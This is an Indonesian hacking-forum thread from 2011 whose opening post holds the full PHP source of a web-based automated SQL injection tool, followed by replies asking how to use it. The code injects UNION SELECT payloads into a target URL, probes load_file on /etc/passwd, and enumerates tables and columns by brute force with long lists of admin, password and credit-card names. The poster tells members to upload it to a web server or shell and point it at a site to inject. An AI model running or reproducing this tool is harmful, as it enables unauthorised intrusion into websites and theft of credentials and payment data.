Home

About

Milis

Blog Roll

Group Facebook

XCode Magazine

1,2,3,4,5,6,7,8,9,10,11,12,13,14,15

Selamat Datang Di Komunitas Yogyafree

Selamat datang di komunitas XCode - Yogyafree - Yogya Family Code. Disini kita saling berbagi ilmu komputer, baik hacking, security, programming, software engineering dan lain sebagainya. Klik disini untuk register

Panel
Welcome! Anonymous

[PHP] SQL Injector Web Based

[ Facebook comments]

Tempat pembahasan dan tutorial penggunaan tools untuk hacking, security dan forensik komputer.

Moderators: Paman, Xshadow, indounderground

Forum rules
Tool yang diupload oleh member tidak diperiksa oleh kami, mungkin saja terinfeksi oleh malware secara disengaja ataupun tidak, saran kami sebaiknya mendownload tool tersebut dari sumber pembuatnya. Bagi yang buat thread diharapkan menampilkan screenshot tool.

[PHP] SQL Injector Web Based

Postby shad.hckr » Tue Oct 25, 2011 11:15 pm

[PHP] SQL Injector Web Based

Originally coded by : [email protected]
Modified by : Xblack

Image

Source code : http://xblack.biz/code.php?id=19

Code: Select all
<html>
<head><title>SQL Injector - Web Version</title>
<style type="text/css">
body{
    background-color: #000;
    font-family: courier new;
    font-size:11px;
    color:#FFFFFF;
}
input,textarea{
    font-family: courier new;
    font-size:11px;
    color:#FFFFFF;
    background-color: #999999;
    border:1px solid #000000;
}
#form {
    text-align:center;
    background-color:#222;
    padding:5px;
}
#error {
    text-align:center;
    background-color:#cc0000;
    padding:5px;
}
</style>
</head>
<body>

<h3>SQL Injector - Web Version - Darkc0de - Xblack</h3>
<form action="" method="POST">
<div id="form">Url : <input type="text" name="url" size="70"> End : <input type="text" name="end" size="3"><br>
<input type="submit" value="inject"><br><br>
Created by : darkc0de | Modified into web version by <a href="http://xblack.biz">Xblack</a> &copy; 2011</div>
</form>
<pre><?php
set_time_limit(0);
if(isset($_POST['url'])) {
    if(empty($_POST['end'])) {
        $end = "--";
    } else {
        $end = $_POST['end'];
    }   
    injector($_POST['url'],$end);
}

function injector($url,$end) {
        if(!preg_match("/darkc0de/", $url)) {
            print "<div id='error'>[?] Example: http://site.com/index.php?id=darkc0de&pg=news</div>\n";
        } else {
       
        switch($end) {
            case '--' :
            $end = '--';
            break;
            case '/*' :
            $end = '/*';
            break;
            default:
            $end = '--';
            break;
        }
       
        print "[-] URL : $url\n";
        print "[%] Trying connect to host...\n";
        if(con_host($url))
        {
            print "[+] Connect to host successful\n";
            print Get_Info($url);
            print "[-] Finding column number...\n";
            print "[-] Testing : ";
            inject_get_column_num($url, $end);
           
        } else {
            print "[!] Connect to host failed\n";
        }}
}
function inject_get_column_num($url, $end) {

    $max = 100;
    $stop = 0;
   
    $rurl = $url;
   
    for($i = 0; $i <= $max; $i++) {
    $word .= "concat(0x6461726B63306465,0x3a,".str_repeat($i,1).",0x3a),";
    $sql = str_replace("darkc0de", "1+AND+1=2+UNION+ALL+SELECT+".rtrim($word,",")."+$ending", $url);
    print "$i,";
    if(preg_match("/darkc0de:([0-9]+):/i", con_host($sql), $val)) {
        print "\n[+] Found column number: ".$i."\n";
        print "[+] Null Number: ".$val[1]."\n";
        save_log('injector.txt', "[-] Found column number: ".$i."\r\n");
        save_log('injector.txt', "[-] Null Number: ".$val[1]."\r\n");
       
        for($a = 0; $a <= $i; $a++) {
        $col .= "$a,";
         if($a == $val[1]) {
             $col = str_replace($val[1], "darkc0de", $col);
         }
        }
        $real = str_replace("darkc0de", "1+AND+1=2+UNION+ALL+SELECT+".rtrim($col,",")."+$ending", $rurl);
        print "[+] URL: ".$real."\n";
        save_log('injector.txt', "[+] URL: ".$real."\r\n");
        sql_info($real);
    }
  }
}
function sql_info($url) {
   
    $table_4 = array(
    'tbladmins','sort','_wfspro_admin','4images_users','a_admin','account','accounts','adm','admin','admin_login','admin_user','admin_userinfo','administer','administrable','administrate','administration','administrator','administrators','adminrights','admins','adminuser','art','article_admin','articles','artikel','密� ?','aut','author','autore','backend','backend_users','backenduser','bbs','book','chat_config','chat_messages','chat_users','client','clients','clubconfig','company','config','contact','contacts','content','control','cpg_config','cpg132_users','customer','customers','customers_basket','dbadmins','dealer','dealers','diary','download','Dragon_users','e107.e107_user','e107_user','forum.ibf_members','fusion_user_groups','fusion_users','group','groups','ibf_admin_sessions','ibf_conf_settings','ibf_members','ibf_members_converge','ibf_sessions','icq','images','index','info','ipb.ibf_members','ipb_sessions','joomla_users','jos_blastchatc_users','jos_comprofiler_members','jos_contact_details','jos_joomblog_users','jos_messages_cfg','jos_moschat_users','jos_users','knews_lostpass','korisnici','kpro_adminlogs','kpro_user','links','login','login_admin','login_admins','login_user','login_users','logins','logon','logs','lost_pass','lost_passwords','lostpass','lostpasswords','m_admin','main','mambo_session','mambo_users','manage','manager','mb_users','member','memberlist','members','minibbtable_users','mitglieder','movie','movies','mybb_users','mysql','mysql.user','name','names','news','news_lostpass','newsletter','nuke_authors','nuke_bbconfig','nuke_config','nuke_popsettings','nuke_users','用户','obb_profiles','order','orders','parol','partner','partners','passes','password','passwords','perdorues','perdoruesit','phorum_session','phorum_user','phorum_users','phpads_clients','phpads_config','phpbb_users','phpBB2.forum_users','phpBB2.phpbb_users','phpmyadmin.pma_table_info','pma_table_info','poll_user','punbb_users','pwd','pwds','reg_user','reg_users','registered','reguser','regusers','session','sessions','settings','shop.cards','shop.orders','site_login','site_logins','sitelogin','sitelogins','sites','smallnuke_members','smf_members','SS_orders','statistics','superuser','sysadmin','sysadmins','system','sysuser','sysusers','table','tables','tb_admin','tb_administrator','tb_login','tb_member','tb_members','tb_user','tb_username','tb_usernames','tb_users','tbl','tbl_user','tbl_users','tbluser','tbl_clients','tbl_client','tblclients','tblclient','test','usebb_members','user','user_admin','user_info','user_list','user_login','user_logins','user_names','usercontrol','userinfo','userlist','userlogins','username','usernames','userrights','users','vb_user','vbulletin_session','vbulletin_user','voodoo_members','webadmin','webadmins','webmaster','webmasters','webuser','webusers','x_admin','xar_roles','xoops_bannerclient','xoops_users','yabb_settings','yabbse_settings','ACT_INFO','ActiveDataFeed','Category','CategoryGroup','ChicksPass','ClickTrack','Country','CountryCodes1','CustomNav','DataFeedPerformance1','DataFeedPerformance2','DataFeedPerformance2_incoming','DataFeedShowtag1','DataFeedShowtag2','DataFeedShowtag2_incoming','dtproperties','Event','Event_backup','Event_Category','EventRedirect','Events_new','Genre','JamPass','MyTicketek','MyTicketekArchive','News','PerfPassword','PerfPasswordAllSelected','Promotion','ProxyDataFeedPerformance','ProxyDataFeedShowtag','ProxyPriceInfo','Region','SearchOptions','Series','Sheldonshows','StateList','States','SubCategory','Subjects','Survey','SurveyAnswer','SurveyAnswerOpen','SurveyQuestion','SurveyRespondent','sysconstraints','syssegments','tblRestrictedPasswords','tblRestrictedShows','TimeDiff','Titles','ToPacmail1','ToPacmail2','UserPreferences','uvw_Category','uvw_Pref','uvw_Preferences','Venue','venues','VenuesNew','X_3945','tblArtistCategory','tblArtists','tblConfigs','tblLayouts','tblLogBookAuthor','tblLogBookEntry','tblLogBookImages','tblLogBookImport','tblLogBookUser','tblMails','tblNewCategory','tblNews','tblOrders','tblStoneCategory','tblStones','tblUser','tblWishList','VIEW1','viewLogBookEntry','viewStoneArtist','vwListAllAvailable','CC_info','CC_username','cms_user','cms_users','cms_admin','cms_admins','user_name','jos_user','table_user','email','mail','bulletin','cc_info','login_name','admuserinfo','userlistuser_list','SiteLogin','Site_Login','UserAdmin','Admins','Login','Logins'
    );
   
    $column_4 = array(
'user','username','password','passwd','pass','cc_number','id','email','emri','fjalekalimi','pwd','user_name','customers_email_address','customers_password','user_password','name','user_pass','admin_user','admin_password','admin_pass','usern','user_n','users','login','logins','login_user','login_admin','login_username','user_username','user_login','auid','apwd','adminid','admin_id','adminuser','adminuserid','admin_userid','adminusername','admin_username','adminname','admin_name','usr','usr_n','usrname','usr_name','usrpass','usr_pass','usrnam','nc','uid','userid','user_id','myusername','mail','emni','logohu','punonjes','kpro_user','wp_users','emniplote','perdoruesi','perdorimi','punetoret','logini','llogaria','fjalekalimin','kodi','emer','ime','korisnik','korisnici','user1','administrator','administrator_name','mem_login','login_password','login_pass','login_passwd','login_pwd','sifra','lozinka','psw','pass1word','pass_word','passw','pass_w','user_passwd','userpass','userpassword','userpwd','user_pwd','useradmin','user_admin','mypassword','passwrd','admin_pwd','admin_passwd','mem_password','memlogin','e_mail','usrn','u_name','uname','mempassword','mem_pass','mem_passwd','mem_pwd','p_word','pword','p_assword','myname','my_username','my_name','my_password','my_email','cvvnumber','about','access','accnt','accnts','account','accounts','admin','adminemail','adminlogin','adminmail','admins','aid','aim','auth','authenticate','authentication','blog','cc_expires','cc_owner','cc_type','cfg','cid','clientname','clientpassword','clientusername','conf','config','contact','converge_pass_hash','converge_pass_salt','crack','customer','customers','cvvnumber]','data','db_database_name','db_hostname','db_password','db_username','download','e-mail','emailaddress','full','gid','group','group_name','hash','hashsalt','homepage','icq','icq_number','id_group','id_member','images','index','ip_address','last_ip','last_login','lastname','log','login_name','login_pw','loginkey','loginout','logo','md5hash','member','member_id','member_login_key','member_name','memberid','membername','members','new','news','nick','number','nummer','pass_hash','passwordsalt','passwort','personal_key','phone','privacy','pw','pwrd','salt','search','secretanswer','secretquestion','serial','session_member_id','session_member_login_key','sesskey','setting','sid','spacer','status','store','store1','store2','store3','store4','table_prefix','temp_pass','temp_password','temppass','temppasword','text','un','user_email','user_icq','user_ip','user_level','user_passw','user_pw','user_pword','user_pwrd','user_un','user_uname','user_usernm','user_usernun','user_usrnm','userip','userlogin','usernm','userpw','usr2','usrnm','usrs','warez','xar_name','xar_pass'
);
   
    print "[-] Getting sql server information...\n";
    $info = array(
    'User' => 'user()',
    'Database' => 'database()',
    'Version' => 'version()'
    );
   
    $rurl = $url;
    $rurl2 = $url;
    $rurl3 = $url;
   
    $ending = '--';
   
    foreach($info as $get => $val) {
        if(preg_match("/darkc0de:(.*?):darkc0de/", con_host("".str_replace("darkc0de", "".$string."+concat(0x6461726B63306465,0x3a,$val,0x3a,0x6461726B63306465)+", $url).""), $value)) {
            print "[-] $get: $value[1]\n";
            save_log('injector.txt', "[-] $get: $value[1]\r\n");
        }}
        print "[-] Testing load file...\n";
    $load = str_replace("darkc0de", "".$string."load_file(0x2f6574632f706173737764)", $rurl);
    if(preg_match("/root:x:/", con_host($load))) {
        print "[-] w00t w00t, you have permission to load file!\n";
        print "[-] URL: $load\n";
        save_log('injector.txt', "[-] w00t w00t, you have permission to load file!\r\n");
        save_log('injector.txt', "[-] URL: $load\r\n");
    } else {
        print "[-] No permission to load file :( \n";
    }
            if(preg_match("/darkc0de:5.(.*?):darkc0de/", con_host("".str_replace("darkc0de", "concat(0x6461726B63306465,0x3a,version(),0x3a,0x6461726B63306465)", $url).""), $value)) {
                print "[-] MySQL Server version is : 5.x\n";
                print "[-] Start extract the column and table...\n";
                print "[-] Table : Column\n";
                $url = str_replace("darkc0de", "concat(char(88,98,108,97,99,107,58),count(table_name),char(58,88,98,108,97,99,107))", $url);
                //$url = str_replace($ending, "+from+information_schema.tables+where+table_schema=database()+$ending", $url);
                $url = "$url+from+information_schema.tables+where+table_schema=database()$ending";
                if(preg_match("/Xblack:([0-9]+):Xblack/", con_host($url), $totaltbl)) {
                   print "[+] Total Table Found: ".$totaltbl[1]."\n";
                   save_log('injector.txt', "[+] Total Table Found: ".$totaltbl[1]."\r\n");
                   for($i = 0; $i <= $totaltbl[1]; $i++) {
                  $urlxx = str_replace("darkc0de","concat(char(88,98,108,97,99,107,58),table_name,char(58,88,98,108,97,99,107))",$rurl2);
                  $urlxx = $urlxx."from+information_schema.tables+where+table_schema=database()+limit+".$i.",1+$ending";
                  if(preg_match("/Xblack:(.*?):Xblack/", con_host($urlxx), $table_name)) {
                      print "[-] Table: ".$table_name[1]."\n";
                      save_log('injector.txt', "[-] Table: ".$table_name[1]."\r\n");
                    $urlxxx = str_replace("darkc0de","concat(char(88,98,108,97,99,107,58),count(column_name),char(58,88,98,108,97,99,107))",$rurl2);
                    $urlxxx = $urlxxx."from+information_schema.columns+where+table_name=0x".HexValue($table_name[1])."+$ending";
                      if(preg_match("/Xblack:(.*?):Xblack/", con_host($urlxxx), $totalclm)) {
                          print "[+] Total Column in ".$table_name[1].": ".$totalclm[1]."\n";
                          save_log('injector.txt', "[+] Total Column in ".$table_name[1].": ".$totalclm[1]."\r\n");
                          for($a = 0; $a <= $totalclm[1]; $a++) {
                            $urlxxxx = str_replace("darkc0de","concat(char(88,98,108,97,99,107,58),column_name,char(58,88,98,108,97,99,107))",$rurl3);
                            $urlxxxx = $urlxxxx."from+information_schema.columns+where+table_name=0x".HexValue($table_name[1])."+limit+".$a.",1+$ending";
                              if(preg_match("/Xblack:(.*?):Xblack/", con_host($urlxxxx), $column_name)) {
                                  print "".$column_name[1].",";
                                  save_log('injector.txt', "".$column_name[1].",");
                             }
                          }
                          print "\n";
                          save_log('injector.txt', "\r\n");
                      }
                  }
                   }
                   
                }

            } else {
                print "[-] MySQL Server version is : 4.x\n";
                print "[-] Start automatic column and table finder...\n";
                print "[-] This may take a few minutes or hours to finish\n";
                foreach($table_4 as $table) {
                    $i++;
                    $url = str_replace("concat(0x696E6A336374)", "concat(0x6461726B63306465)", $rurl);
                    $url = str_replace($ending, "+from+".$table."+$ending", $url);
                    if(preg_match("/darkc0de/", con_host($url))) {
                        print "[$i] Found Table : $table\n";
                        save_log('injector.txt', "[-] Found Table : $table\r\n");
                        print "[-] Finding column...\n";
                         foreach($column_4 as $column) {
                             $url = str_replace("darkc0de", "concat(0x6461726B63306465,0x3a,$column,0x3a,0x6461726B63306465)", $rurl);
                            $url = str_replace("$ending", "+from+".$table."+$ending", $url);
                            if(preg_match("/darkc0de:(.*?):darkc0de/", con_host($url))) {
                                print "[-] Found column: $column\n";
                                save_log('injector.txt', "[-] Found column: $column\r\n");
                            }
                         }
                         save_log('injector.txt', "\r\n");
                         print "[-] Done searching column inside $table table\n";
                       
                    }
                }
            }
    print "[-] Done\n";
    print "[-] See 'injector.txt' to see the log\n";
    exit;
}
function HexValue($text) {
     for($i = 0; $i < strlen($text); $i++) {
         $a .= dechex(ord($text[$i]));
     }
     return $a;
}
function Get_Info($site) {
    if($info = con_host($site)) {
        preg_match("/Content-Type:(.+)/", $info, $type);
        preg_match("/Server:(.+)/", $info, $server);
        print "[-] $type[0]\n";
        print "[-] $server[0]\n";
        $ip = parse_url($site);
        print "[-] IP: ".gethostbyname($ip['host'])."\n";
    }
}
function con_host($host) {
    $ch = curl_init($host);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_TIMEOUT, 200);
    curl_setopt($ch, CURLOPT_HEADER, 1);
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
    curl_setopt($ch, CURLOPT_COOKIEFILE, "google_cookies.txt");
    curl_setopt($ch, CURLOPT_COOKIEJAR, "google_cookies.txt");
    curl_setopt($ch, CURLOPT_REFERER, "http://google.com");
    curl_setopt($ch, CURLOPT_USERAGENT, 'Opera/9.80 (J2ME/MIDP; Opera Mini/9.80 (S60; SymbOS; Opera Mobi/23.348; U; en) Presto/2.5.25 Version/10.54');
   
    $pg = curl_exec($ch);
    if($pg){
        return $pg;
    } else {
        return false;
    }
}
function save_log($fname = '', $text = '') {
    $file = @fopen(dirname(__FILE__).'/'.$fname.'', 'a');
    $write = @fwrite($file, $text, '60000000');
    if($write) {
        return 1;
    } else {
        return 0;
    }
}?>
</body>
<html>
User avatar
shad.hckr
 
Posts: 555
Joined: Mon Sep 29, 2008 4:48 am
Location: /home/sh4dhckr

Re: [PHP] SQL Injector Web Based

Postby NoThee » Wed Oct 26, 2011 12:23 am

om mau tanya cara pake kodenya ntu di apain y ane bingung sering ng'liat code2 php kya gt tp gk tau hrs di apain...?
tolong y jawabannya...sorry newbie
NoThee
 
Posts: 9
Joined: Sun Sep 18, 2011 1:12 am

Re: [PHP] SQL Injector Web Based

Postby shad.hckr » Wed Oct 26, 2011 12:39 am

1. save code diatas make extensi php (ex : sqli.php )
2. upload ke web/shell
3. buka di browser.
4. masukin link yang mau di inject ( ex : http://domain.com/file.php?var=darkc0de )
User avatar
shad.hckr
 
Posts: 555
Joined: Mon Sep 29, 2008 4:48 am
Location: /home/sh4dhckr

Re: [PHP] SQL Injector Web Based

Postby NoThee » Wed Oct 26, 2011 12:49 am

upload ke web/shell gmn caranya...?
NoThee
 
Posts: 9
Joined: Sun Sep 18, 2011 1:12 am

Re: [PHP] SQL Injector Web Based

Postby shad.hckr » Wed Oct 26, 2011 5:07 am

NoThee wrote:upload ke web/shell gmn caranya...?

cari di thread yang laen ada banyak tutorialnya.
User avatar
shad.hckr
 
Posts: 555
Joined: Mon Sep 29, 2008 4:48 am
Location: /home/sh4dhckr

Re: [PHP] SQL Injector Web Based

Postby poni » Wed Oct 26, 2011 5:20 am

keren pak shad
.::...Cr3ditz......::....
join us : www.xcode.or.id - 001101
"@ b3tt3r d1g1t4l w0rlD" -- 010110000110001001
User avatar
poni
 
Posts: 1666
Joined: Mon Dec 05, 2005 10:44 am
Location: Indonesia

Re: [PHP] SQL Injector Web Based

Postby Digital Cat » Wed Oct 26, 2011 7:29 am

Top Markotop..

ijin Copy Code nya ya..

:Dkalo ada yg udah upload ..

bagi linknya yach..

lagi PW ki PW - Posisi wenak.
User avatar
Digital Cat
 
Posts: 437
Joined: Fri Jun 26, 2009 6:13 pm
Location: USA

Re: [PHP] SQL Injector Web Based

Postby yuanryuzaki » Fri Nov 11, 2011 1:38 am

udah ane coba mase,,, dan berhasil di upload ke web :D
yuanryuzaki
 
Posts: 9
Joined: Thu Nov 10, 2011 4:45 pm

Re: [PHP] SQL Injector Web Based

Postby oramelu2 » Mon Jan 02, 2012 11:06 pm

bs dijalanin dan sukses sebagaimana mestinya gan?
oramelu2
 
Posts: 3
Joined: Mon Jan 02, 2012 10:52 pm

Re: [PHP] SQL Injector Web Based

Postby googlegirl » Thu Jan 05, 2012 8:15 am

maaf abang2 semua..saya bru dlm nie...gimana nk guna sql ini dan dimana gwa maw d.load sql injection??
googlegirl
 
Posts: 4
Joined: Thu Jan 05, 2012 7:33 am

leave a comment


Return to Tools For Hacking - Security & Computer Forensic

Who is online

Users browsing this forum: No registered users and 12 guests

Web Counter Start : December 14th 2009
Hit Counters

http://www.xcode.or.id